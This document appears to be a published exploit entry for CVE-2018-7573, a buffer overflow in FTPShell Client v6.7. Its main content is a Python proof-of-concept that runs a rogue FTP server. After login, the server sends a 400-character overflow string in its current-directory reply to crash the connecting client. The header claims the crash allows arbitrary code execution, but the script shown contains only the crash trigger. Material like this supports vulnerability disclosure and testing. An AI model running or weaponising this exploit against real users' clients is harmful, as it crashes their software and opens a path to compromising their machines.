# Exploit Title: FTPShell Client v6.7 Buffer Overflow 
# Vector: A remote attacker can send 400 characters of "F" to crash the application and after this overflow you will can to run your arbitrary code on the victim machine. 
# CVEs: CVE-2018-7573
# CWEs: CWE-119
# Dork: N/A
# Discovered By: Ali Abdollahi 
# Attack Type: Remote
# Date: 2018-02-27
---------------------------------------------------------------------------------------------------------------- 
References: 
#!/usr/bin/python
import socket,sys
port = 21
 
try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("Hacker IP Address", port))
        s.listen(5)
        print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
 
buffer = "F" * 400
 
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')